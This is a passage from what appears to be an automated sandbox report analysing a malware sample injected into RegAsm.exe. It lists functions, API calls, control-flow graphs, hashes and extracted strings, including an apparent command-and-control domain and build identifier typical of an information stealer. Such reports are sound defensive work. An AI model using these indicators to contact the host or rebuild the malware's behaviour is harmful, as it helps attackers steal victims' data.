279->273 280->279 283 40afa0-40afa4 281->283 284 40afc1-40afd4 call 432140 281->284 286 40afb0-40afbf 283->286 284->212 291 40afda 284->291 286->284 286->286 288->271 288->289 289->265 291->213
            APIs
            • LoadLibraryExW.KERNELBASE(137B118F,00000000,00000800), ref: 0040A8B2
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: 7641A8A9550F401098A04E632013B2C2$B$traineiwnqo.shop
            • API String ID: 1029625771-3315110752
            • Opcode ID: 34d17edaf40d782ec67320f1e2a09a68fcafa89bbacd7ef14cc55d2e69128cac
            • Instruction ID: 8bf3c8a0dc5432b79849cedbee025762e94b3ba7f0271e702e969951a62f6cf0
            • Opcode Fuzzy Hash: 34d17edaf40d782ec67320f1e2a09a68fcafa89bbacd7ef14cc55d2e69128cac
            • Instruction Fuzzy Hash: 5912BFB01083409FE710DF15D84076EBBE1AF92309F088A2EE5D56B392D7798965CF9B
            Function 00409930 Relevance: 4.5, APIs: 3, Instructions: 32COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 423 409930-409945 call 4099a0 call 433410 428 409947 423->428 429 409949-409956 GetCurrentProcess call 429cb0 423->429 430 40998c-409998 ExitProcess 428->430 433 409958 429->433 434 40995a-409977 GetWindowInfo call 40a810 429->434 436 409985-40998a call 433ec0 433->436 439 409979 434->439 440 40997b-409980 call 40ce00 call 40bcf0 434->440 436->430 439->436 440->436
            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Process$CurrentExit
            • String ID:
            • API String ID: 2333725396-0
            • Opcode ID: 9e9a532d26983c7b588b4a1bc287a377aacdea2b97869028e39f574fbfbb0ff6
            • Instruction ID: 85d1f0525f93d6271b7d803b59661970475abf974338680b697f46506254df6e
            • Opcode Fuzzy Hash: 9e9a532d26983c7b588b4a1bc287a377aacdea2b97869028e39f574fbfbb0ff6
            • Instruction Fuzzy Hash: 02F082B14082108ACA103B728A0632FBB685F1231AF00053FFC82713C3EB3C4D165AAF
            Function 00433DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 576 433de3-433e1f 577 433e21 576->577 578 433e5a-433e67 LoadLibraryExW 576->578 579 433e30-433e58 577->579 580 433e94-433e99 578->580 581 433e69-433e80 578->581 579->578 579->579 581->580
            APIs
            • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 00433E62
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: s
            • API String ID: 1029625771-453955339
            • Opcode ID: f2df3bd0ba6a8576ac6632823765e9fc54261c1f47064a4c1da545078199b780
            • Instruction ID: 4d42e78689078bb1e512328da8b123497e3410b22b9a915000ca559236b053ce
            • Opcode Fuzzy Hash: f2df3bd0ba6a8576ac6632823765e9fc54261c1f47064a4c1da545078199b780
            • Instruction Fuzzy Hash: DD11C6B5A002658BDB00CF68C8857EEBBF2BF0A706F140819D495A7351D37CA9069F68
            Function 00432111 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 582 432111-432124 RtlAllocateHeap
            APIs
            • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 00432124
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID: 0!C
            • API String ID: 1279760036-3093313867
            • Opcode ID: 8753d004f219bdd7219b323af178a09c01ebe98d884d50b0ec1c769fd5c0165b
            • Instruction ID: 04cee9a2c7cb843de1264aaf56dcf5a1e572489f03cca6b25e53b27a8fc7ede0
            • Opcode Fuzzy Hash: 8753d004f219bdd7219b323af178a09c01ebe98d884d50b0ec1c769fd5c0165b
            • Instruction Fuzzy Hash: 3EB01270146110BCD03113114CD5FFF6C2C9F43F65F102024B204140C00754A001D07D
            Function 00432140 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 584 432140-432150 585 4321e2-4321e7 584->585 586 432157-432173 584->586 587 432175 586->587 588 4321cf-4321dc RtlFreeHeap 586->588 589 432180-4321cd 587->589 588->585 589->588 589->589
            APIs
            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 004321DC
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 655819d9c0214d52ee193739dccee6f6407c7ea10fd06675cb2cd853cfd10b71
            • Instruction ID: 02542b3465e1523abc4de0e254be3dcfc07d2ba64744a3a3f7c2d606735d1a8a
            • Opcode Fuzzy Hash: 655819d9c0214d52ee193739dccee6f6407c7ea10fd06675cb2cd853cfd10b71
            • Instruction Fuzzy Hash: 4C11C271A192008BC708DF28D960A2FB7E2EFC5315F18CA2DD1C6473A5DA308811CB86

            Non-executed Functions

            Function 0041AEBD Relevance: 33.0, Strings: 26, Instructions: 488COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: $K;M$%ki$'s7u$*/$+($2w0i$4:$8k>m$=?$?o;a$P?m1$T_$];]=$]_$cSam$d7Z)$e3l5$f#k!$o/d-$75$75$SQ$SQ$WU$WU$_]
            • API String ID: 0-3459135169
            • Opcode ID: 43e28df520d3bcad4ed6ffc926e2c98f2677454a2346b802433a89ba392a3010
            • Instruction ID: b3273fee3340c09fd2804797b29d5d6376960dfe39c91dec08cbd9ec68029d71
            • Opcode Fuzzy Hash: 43e28df520d3bcad4ed6ffc926e2c98f2677454a2346b802433a89ba392a3010
            • Instruction Fuzzy Hash: 8F420DB8900B568FD764CF25D58079AFBB1FB05300F509A9CD4AAAFB52C770A482CF85
            Function 00423300 Relevance: 15.7, APIs: 2, Strings: 6, Instructions: 1719COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: >>B$?026$VVOT$WXM,$nLv.$zHPR
            • API String ID: 0-867834115
            • Opcode ID: 9bf2fd2a8e5effd6fcdbc20e51042f77b1d439974a595fd89c3280f55ff4f06a
            • Instruction ID: ea93a7a69c4b05680d95c06564036f72732313c29ab46c91309b5ec1a3ade140
            • Opcode Fuzzy Hash: 9bf2fd2a8e5effd6fcdbc20e51042f77b1d439974a595fd89c3280f55ff4f06a
            • Instruction Fuzzy Hash: 01E2AC70204B928AD325CF35D4907A7BBE1EF52305F58496ED4EB8B782C339A545CF98
            Function 00414160 Relevance: 13.7, Strings: 10, Instructions: 1151COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 8$IC$OI$RR$VA$_W$`c$s$wu$|w
            • API String ID: 0-2501553523
            • Opcode ID: 607335ce91f70844582d8ee9beb93bcaf837bf5f74a2caf647eb6b646c076283
            • Instruction ID: 10dfa4bddb72f2478a683de6888cf7fa89f560f853413485e885e4ec6dbba352
            • Opcode Fuzzy Hash: 607335ce91f70844582d8ee9beb93bcaf837bf5f74a2caf647eb6b646c076283
            • Instruction Fuzzy Hash: 0B7297B450C3808FD314DF29E491AABBBE1EFD6314F14892DE0D58B392D3399945CB9A
            Function 0040B000 Relevance: 11.7, Strings: 9, Instructions: 414COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: *!"#$89$U1\3$W5Y7$X=3?$Z8rOOVpCGVmgWNTmDZS3RE039ad5UG9OEliujIvYDKQ-1724851747-0.0.1.1-/api$\9_;$uv<!$wDI{
            • API String ID: 0-3288668874
            • Opcode ID: 040cc6d3b2dfaad434a7d9b5a635a1e5cecabd74b452b2b531cf3e3ea92861fb
            • Instruction ID: 13237b498112c0df180c9789d066283ae5ca914d3e7ad719bbd32d58a6218ef1
            • Opcode Fuzzy Hash: 040cc6d3b2dfaad434a7d9b5a635a1e5cecabd74b452b2b531cf3e3ea92861fb
            • Instruction Fuzzy Hash: C6E1477010C3809BD311DF18C490A1FBBE1EF86758F588A6EE4D96B392C3399945CB9A
            Function 00418F9A Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 866COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 7654$7654$76547654$ZgUY$c_^X
            • API String ID: 0-832553225
            • Opcode ID: 6419d35331c556af24202c309a051d92a7c5be69a0e6f0271b2b60e5c6cac6a1
            • Instruction ID: 490eac7359a3367a67c91254828de951180072d7f9268015f790fbff1f8a95c7
            • Opcode Fuzzy Hash: 6419d35331c556af24202c309a051d92a7c5be69a0e6f0271b2b60e5c6cac6a1
            • Instruction Fuzzy Hash: D252C074609302DFD704CF28D890A6AB7E2FF89314F18896DE995873A1D738EC91CB56
            Function 0040A2A0 Relevance: 10.4, Strings: 8, Instructions: 371COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: ($0$7641A8A9550F401098A04E632013B2C2$89$NDFB$dk$sghe$xG}E
            • API String ID: 0-2599710177
            • Opcode ID: 1b4427f46b020fa44aaeb7c5af4cf38baa070a64d270e3eeac5ef9614e8fc93d
            • Instruction ID: 3f2d1023407896c9d8e9c386dcd250c56f46485b4f734d3a90c8fec5e180debc
            • Opcode Fuzzy Hash: 1b4427f46b020fa44aaeb7c5af4cf38baa070a64d270e3eeac5ef9614e8fc93d
            • Instruction Fuzzy Hash: CEE114B01083809BD314DF19C490A2FBBF1EF96748F148A2DE5D99B3A2C7399855CB5B
            Function 004297F0 Relevance: 9.1, APIs: 6, Instructions: 116clipboardCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Clipboard$CloseDataLongOpenWindow
            • String ID:
            • API String ID: 1647500905-0
            • Opcode ID: 3a232f2ebb08775f1998ed021a1bb97478409113e4e7ddd384c39079e02d75fb
            • Instruction ID: dbcac529509713fc5bea79e6a5e27dbcbb2f1d32715728547801cd2d791f9ed7
            • Opcode Fuzzy Hash: 3a232f2ebb08775f1998ed021a1bb97478409113e4e7ddd384c39079e02d75fb
            • Instruction Fuzzy Hash: 5B41A5B0A087928FD711AB7CA44436FBFE09B12320F448E2EE0E6977C1D6389945C757
            Function 0041C1E0 Relevance: 6.7, Strings: 5, Instructions: 436COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 2/$4`[b$4`[b$7654$;'
            • API String ID: 0-2626404024
            • Opcode ID: dead9a732aaef337ba81a8b97a69426f2b6bba6f41ebf8f4aaf15f91b6e2aa8a
            • Instruction ID: 26ea63534ae3e6bd61441c9169b9a728b07649db8703110e2030805014c08cb9
            • Opcode Fuzzy Hash: dead9a732aaef337ba81a8b97a69426f2b6bba6f41ebf8f4aaf15f91b6e2aa8a
            • Instruction Fuzzy Hash: 78E198B460C341DFE324DF28E890B6BBBE2FB86344F50882DE1D5872A1D7749845CB5A
            Function 0041CE70 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 462COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b$DD
            • API String ID: 0-2328339180
            • Opcode ID: b807664b0f23e44e8dfdd5e0703170624979a2ebacd0005b70fcfac8561d7c4b
            • Instruction ID: 8271e85c979b581454c923b7ae082495721ad2c20647ae81294568aa8489cf5c
            • Opcode Fuzzy Hash: b807664b0f23e44e8dfdd5e0703170624979a2ebacd0005b70fcfac8561d7c4b
            • Instruction Fuzzy Hash: D5F199B4908340DFD3149F28E890A6BBBF1EF8A348F44692DF1C587361D7799891CB4A
            Function 0041EB5F Relevance: 5.5, Strings: 4, Instructions: 505COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: <($@:$SP$pA
            • API String ID: 0-2096108754
            • Opcode ID: 8800ebda94bbcbceaaaab540bed2ff5570ed544b76802edd7efdae9079de000d
            • Instruction ID: 7340faad33d1629b880e59b953aa0262a307575ebe5f3bf1aba39aafcfb50f41
            • Opcode Fuzzy Hash: 8800ebda94bbcbceaaaab540bed2ff5570ed544b76802edd7efdae9079de000d
            • Instruction Fuzzy Hash: 3D029DB4E0021ACFDB04CF99D891AAEFBB1FF49300F148559E815AB396D734A941CF95
            Function 00413555 Relevance: 4.5, Strings: 3, Instructions: 736COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b$u s$}z{
            • API String ID: 0-2227352053
            • Opcode ID: 5bc1016c9887d98cd87b361dd3af6ff5bf015ecf9d6371ae1b25fb4791e535a8
            • Instruction ID: b1540de6ea930d979f3ac0be3d11990741c7919bfbe03e51bc4ef102b9e3bfad
            • Opcode Fuzzy Hash: 5bc1016c9887d98cd87b361dd3af6ff5bf015ecf9d6371ae1b25fb4791e535a8
            • Instruction Fuzzy Hash: B332ABB19083409FD710DF28C88166BB7E1FF89359F04492EE8D997352E338EA45CB5A
            Function 0041A7D8 Relevance: 3.0, Strings: 2, Instructions: 527COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b$7654
            • API String ID: 0-3675246634
            • Opcode ID: 762f7185b1c4e14a82dbf99af9a8724a603defb7888c91f406ae992e52300a96
            • Instruction ID: b4e1a4e571836c98069d91dca60e392b914ae0c73ff45b0ab22b483f2380cc65
            • Opcode Fuzzy Hash: 762f7185b1c4e14a82dbf99af9a8724a603defb7888c91f406ae992e52300a96
            • Instruction Fuzzy Hash: 6402E075D0121ACBCB14CF68C890AEEB7B2FF49300F19849AD841AB351D7399D92CB99
            Function 00412D9D Relevance: 2.8, Strings: 2, Instructions: 308COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b$7654
            • API String ID: 0-3675246634
            • Opcode ID: 26ba02447477ea38d195325f5eb1c8a7aebefafab284258121ab35c6d5674d94
            • Instruction ID: 333ecfdf8dde34d4f6aa56c3055041ae65c4990cfcc230d53f1201f838be33fa
            • Opcode Fuzzy Hash: 26ba02447477ea38d195325f5eb1c8a7aebefafab284258121ab35c6d5674d94
            • Instruction Fuzzy Hash: 7381F0B1900219CBDB10CF58DC92AFB73B1FF49314F14416AE902AB391E7799A51CBA9
            Function 00423C24 Relevance: 1.8, Strings: 1, Instructions: 550COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: vT^8
            • API String ID: 0-144666228
            • Opcode ID: b38f1c914150a82d71dba4a7d34c916fa422f328e48b7d3e7041ec82bd7b7369
            • Instruction ID: 776c1141c75b7c48ae07388f2282c87ac763d8598ed6de0d22014516fa7d8ead
            • Opcode Fuzzy Hash: b38f1c914150a82d71dba4a7d34c916fa422f328e48b7d3e7041ec82bd7b7369
            • Instruction Fuzzy Hash: 2B028A70204B918ED325CF29D4907A7FBF1AF56304F58886EC4EA87B92C779E506CB58
            Function 0040EFE0 Relevance: 1.8, Strings: 1, Instructions: 503COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: z
            • API String ID: 0-1657960367
            • Opcode ID: 47a4703f915b1ed9d066ce045131ab22f6a65df2d17df319f2ed5deaab2be635
            • Instruction ID: e88c94cb3b04df96840fc0172771b105016a4bba1c105683a476d3149dcf9044
            • Opcode Fuzzy Hash: 47a4703f915b1ed9d066ce045131ab22f6a65df2d17df319f2ed5deaab2be635
            • Instruction Fuzzy Hash: 1602F2B1508341CFD725DF28D88076BB7E1AF96308F14493DE489A7392E739E849CB5A
            Function 00418580 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON
            Download Yara Rule
            APIs
            • CoCreateInstance.OLE32(00439538,00000000,00000001,00439528), ref: 004185A9
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: CreateInstance
            • String ID:
            • API String ID: 542301482-0
            • Opcode ID: d5f447d211a7cba372c16b306cb673dcabc9674c1706a01d02b47f76867fc8f4
            • Instruction ID: c53532734e796bbb99004340195012868f4fa42433ebcb6ea21c5507683797a7
            • Opcode Fuzzy Hash: d5f447d211a7cba372c16b306cb673dcabc9674c1706a01d02b47f76867fc8f4
            • Instruction Fuzzy Hash: DB51DFB1600200ABDB209B24CC86BB733B4EF85358F28451DF9958B3D1EB78DC81C72A
            Function 00424D86 Relevance: 1.7, Strings: 1, Instructions: 446COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: vT^8
            • API String ID: 0-144666228
            • Opcode ID: a3e3e63fcae0696028850abea55257ed1e89a5802acf22014d01533ab12af6b0
            • Instruction ID: 22b36863259243b647174d57ba2f837181b340375f30714746ca0cf978050850
            • Opcode Fuzzy Hash: a3e3e63fcae0696028850abea55257ed1e89a5802acf22014d01533ab12af6b0
            • Instruction Fuzzy Hash: 25E1BE70104B918FD366CF29C5507A7FBF1AF56304F9488AEC8EA8B782C779A905CB54
            Function 004187E0 Relevance: 1.7, Strings: 1, Instructions: 436COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b
            • API String ID: 0-3962175265
            • Opcode ID: 12a71d5f4cfc59184df24093cdc20bc31f4f7f729086096da5d0df1e0ebd6032
            • Instruction ID: c3bd3ee625d69e8edcc46d0a119240d42c353e60cc7f944bccecc0c9f18af3c7
            • Opcode Fuzzy Hash: 12a71d5f4cfc59184df24093cdc20bc31f4f7f729086096da5d0df1e0ebd6032
            • Instruction Fuzzy Hash: 04D1CFB16082009BD714EF14C891AABB7F1EF96354F08491EF8C597391E739ED81CB9A
            Function 00420710 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: "
            • API String ID: 0-123907689
            • Opcode ID: 939dc505111095dae399a0b3139c9c85ded5718a9b0a5185b11e47deb40da2d0
            • Instruction ID: 68498b8493db956e5a25b608bae379dc603377d76d878f896cd3c4e5f10ba62c
            • Opcode Fuzzy Hash: 939dc505111095dae399a0b3139c9c85ded5718a9b0a5185b11e47deb40da2d0
            • Instruction Fuzzy Hash: 99C1F6B2B043215BD724DE24D481B6BBBD5AF84314F99852EE88587383D63CED44C7DA
            Function 00419A55 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 7654
            • API String ID: 0-4024152101
            • Opcode ID: 3504394762c3f94a12b0f270924edc5e951516a17c3d17f5c9fd680f93e6bd29
            • Instruction ID: 7e542ee3ddbc02d0726da7b392e5b7563b94215d8191e3ce3909413af34983d8
            • Opcode Fuzzy Hash: 3504394762c3f94a12b0f270924edc5e951516a17c3d17f5c9fd680f93e6bd29
            • Instruction Fuzzy Hash: 5EA1AE75A19202CFD708CF28E89076AB3E2FF89311F1986BCE985873A5D734E951CB45
            Function 004123AD Relevance: 1.4, Strings: 1, Instructions: 161COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: }{
            • API String ID: 0-2556126010
            • Opcode ID: 86fc7bbb8f71fa9e90ffa16d517ba7d6b08b3ad923dd2956ec98f4b4a303de33
            • Instruction ID: 1c8095d0e3db8fd1363295c4017b50b60a96a1c7182979d9b04a7b154951caee
            • Opcode Fuzzy Hash: 86fc7bbb8f71fa9e90ffa16d517ba7d6b08b3ad923dd2956ec98f4b4a303de33
            • Instruction Fuzzy Hash: 1E518DB4200602DFD324CF29C5A1A62B7F2FF4A350B24994DD4D6CBB54D379E8A1CB98
            Function 004100CB Relevance: 1.4, Strings: 1, Instructions: 133COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: B
            • API String ID: 0-1255198513
            • Opcode ID: f7e32b4fc022e045620a3b265961e9345ef1b34c66be138370ccbbe0513876fa
            • Instruction ID: ae76bd3f89ee397e63b9bccb40564e20378e0b346a78422d95f96686f7635e10
            • Opcode Fuzzy Hash: f7e32b4fc022e045620a3b265961e9345ef1b34c66be138370ccbbe0513876fa
            • Instruction Fuzzy Hash: 214168706083808BD315DB28D881BAEBBF5AF96348F044C2DE1C9D7362D77A98958B57
            Function 004366B0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: @
            • API String ID: 2994545307-2766056989
            • Opcode ID: 055c23388ece44485477c6dc09a2d7129e63bbbc7650c81042cd163ed5f8e42a
            • Instruction ID: f722ca51760dcfb18ae79715c3000d80a43b571bf7b112194cb9bff4a1ec53d8
            • Opcode Fuzzy Hash: 055c23388ece44485477c6dc09a2d7129e63bbbc7650c81042cd163ed5f8e42a
            • Instruction Fuzzy Hash: 1031FC715083059FD300DF08C88166BFBF5FF89358F55992EE98887360D339E9098BAA
            Function 0041E594 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 4`[b
            • API String ID: 0-3962175265
            • Opcode ID: 2e93865f553a4f5a092ef84bcd68ca5bb9323686f0a0824487b1fba554725558
            • Instruction ID: d76ead9e38f0ebf03a4d97c438e767dfbadc3f595c9280ab3cbc68496a962fe9
            • Opcode Fuzzy Hash: 2e93865f553a4f5a092ef84bcd68ca5bb9323686f0a0824487b1fba554725558
            • Instruction Fuzzy Hash: C3015B386083529BD318CF05D4A046FFBE2AFDA355F54992DE8CA533A1C334E881CB4A
            Function 00423E16 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: d>B
            • API String ID: 0-1770553647
            • Opcode ID: e65179d5fc362a254d7a78c5370ec306f83d82cf524f8830032bebd8a4b5c8b1
            • Instruction ID: 23d159685a26b8453a6add6a6c9c561a5425bbce7eb9bae6a5b29bf5e7ef4885
            • Opcode Fuzzy Hash: e65179d5fc362a254d7a78c5370ec306f83d82cf524f8830032bebd8a4b5c8b1
            • Instruction Fuzzy Hash: B4F08C2804C2E389C7028A3A60D0332BFA34FA7681F6D5182C0D00B352D73F8A0E866A
            Function 00423BC9 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: <B
            • API String ID: 0-741197489
            • Opcode ID: ba74ca6b23f664b2fe6cd97c599448c92381694e970d502f5621a21756412b00
            • Instruction ID: 56eddd5710ab9f3ba3c064f54dcf7cfd11df33fa5d5c1aa68379b27648139a91
            • Opcode Fuzzy Hash: ba74ca6b23f664b2fe6cd97c599448c92381694e970d502f5621a21756412b00
